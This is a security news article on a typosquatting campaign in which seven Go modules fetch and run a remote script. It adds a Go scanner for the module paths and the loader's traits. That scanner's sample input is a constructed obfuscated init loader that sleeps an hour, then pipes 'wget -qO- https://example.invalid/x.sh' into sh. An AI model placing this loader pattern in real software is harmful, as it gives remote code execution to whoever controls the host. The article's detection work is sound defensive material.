Cybersecurity researchers are warning of an ongoing malicious campaign targeting the Go ecosystem with typosquatted modules designed to deploy loader malware on Linux and Apple macOS systems.
“The threat actor has published at least seven packages impersonating widely used Go libraries, including one (github[.]com/shallowmulti/hypert) that appears to target financial-sector developers,” Socket researcher Kirill Boychenko said in a new report.

“These packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor capable of pivoting rapidly.”
At the time of writing, all seven packages remain available through the official Go module mirror, while their corresponding GitHub repositories, with the exception of "github[.]com/ornatedoctrin/layout", are no longer accessible. Note that because the Go module proxy caches modules it has already served, deleting the upstream GitHub repository does not by itself make a module unavailable to `go get`. The offending Go packages are:
- shallowmulti/hypert (github.com/shallowmulti/hypert)
- shadowybulk/hypert (github.com/shadowybulk/hypert)
- belatedplanet/hypert (github.com/belatedplanet/hypert)
- thankfulmai/hypert (github.com/thankfulmai/hypert)
- vainreboot/layout (github.com/vainreboot/layout)
- ornatedoctrin/layout (github.com/ornatedoctrin/layout)
- utilizedsun/layout (github.com/utilizedsun/layout)
The counterfeit packages, Socket's analysis found, contain code that achieves remote code execution by running an obfuscated shell command to fetch and execute a script hosted on a remote server ("alturastreet[.]icu"). In a likely effort to evade sandbox and dynamic analysis, the remote script is not fetched until an hour has elapsed.
The end goal of the attack is to install and run an executable file that can potentially steal data or credentials.
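To turn the indicators above into something a team can run, here is an added example in Go (not code from Socket's report or from the malicious packages themselves). It checks a go.mod for the seven module paths listed above and scans a Go source file for the three traits the report describes: a shell spawned through exec.Command, a time-based delay, and a string assembled from an array with an empty separator. The go.mod text and the source snippet are constructed stand-ins, the example.invalid URL is a placeholder rather than the real staging domain, and the source checks are triage heuristics, not a verdict.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// knownBad holds the seven typosquatted module paths named in the Socket report.
var knownBad = []string{
	"github.com/shallowmulti/hypert", "github.com/shadowybulk/hypert",
	"github.com/belatedplanet/hypert", "github.com/thankfulmai/hypert",
	"github.com/vainreboot/layout", "github.com/ornatedoctrin/layout",
	"github.com/utilizedsun/layout",
}

// CheckGoMod returns each required module path that exactly matches a known-bad path.
func CheckGoMod(gomod string) []string {
	var hits []string
	for _, line := range strings.Split(gomod, "\n") {
		fields := strings.Fields(strings.TrimPrefix(strings.TrimSpace(line), "require "))
		if len(fields) == 0 {
			continue
		}
		for _, bad := range knownBad {
			if fields[0] == bad {
				hits = append(hits, bad)
			}
		}
	}
	return hits
}

// ScanSource parses one Go file and flags the traits the report describes: a shell spawned
// via exec.Command, a time-based delay, and a string joined from an array with "" separator.
func ScanSource(src string) []string {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, "sample.go", src, 0)
	if err != nil {
		return []string{"parse error: " + err.Error()}
	}
	var findings []string
	ast.Inspect(file, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		sel, ok := call.Fun.(*ast.SelectorExpr)
		if !ok {
			return true
		}
		pkg, ok := sel.X.(*ast.Ident)
		if !ok {
			return true
		}
		fn := pkg.Name + "." + sel.Sel.Name
		line := fset.Position(call.Pos()).Line
		switch fn {
		case "exec.Command":
			if len(call.Args) > 0 {
				if lit, ok := call.Args[0].(*ast.BasicLit); ok && lit.Kind == token.STRING {
					if name, err := strconv.Unquote(lit.Value); err == nil && strings.HasSuffix(name, "sh") {
						findings = append(findings, fmt.Sprintf("%d: shell spawned via exec.Command(%s)", line, lit.Value))
					}
				}
			}
		case "time.Sleep", "time.AfterFunc":
			findings = append(findings, fmt.Sprintf("%d: delayed execution via %s", line, fn))
		case "strings.Join":
			if len(call.Args) == 2 {
				if sep, ok := call.Args[1].(*ast.BasicLit); ok && sep.Value == `""` {
					findings = append(findings, fmt.Sprintf("%d: string assembled from an array with empty separator (array-based obfuscation)", line))
				}
			}
		}
		return true
	})
	return findings
}

// sampleGoMod and sampleSrc are constructed inputs, not campaign code; example.invalid is a placeholder.
const sampleGoMod = "module example.invalid/app\n\nrequire (\n\tgithub.com/shallowmulti/hypert v0.1.0\n\tgithub.com/stretchr/testify v1.9.0\n)\n"
const sampleSrc = `package hypert
import ("os/exec"; "strings"; "time")
func init() {
	parts := []string{"w", "g", "e", "t", " ", "-", "q", "O", "-", " ", "https://example.invalid/x.sh", " ", "|", " ", "sh"}
	go func() {
		time.Sleep(time.Hour)
		exec.Command("/bin/sh", "-c", strings.Join(parts, "")).Run()
	}()
}
`

func main() {
	fmt.Println(CheckGoMod(sampleGoMod), ScanSource(sampleSrc))
}
```

Run it against a real checkout by replacing sampleGoMod and sampleSrc with the file contents; a hit on CheckGoMod is an indicator of compromise, while ScanSource findings (delay plus shell plus joined array in the same file) are what should prompt a manual look at any new or unfamiliar dependency.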
The disclosure arrived a month after Socket revealed another instance of a software supply chain attack targeting the Go ecosystem via a malicious package capable of granting the adversary remote access to infected systems.
“The repeated use of identical filenames, array-based string obfuscation, and delayed execution tactics strongly suggests a coordinated adversary who plans to persist and adapt,” Boychenko noted.
“The discovery of multiple malicious hypert and layout packages, along with multiple fallback domains, points to an infrastructure designed for longevity, enabling the threat actor to pivot whenever a domain or repository is blacklisted or removed.”
Some parts of this article are sourced from:
thehackernews.com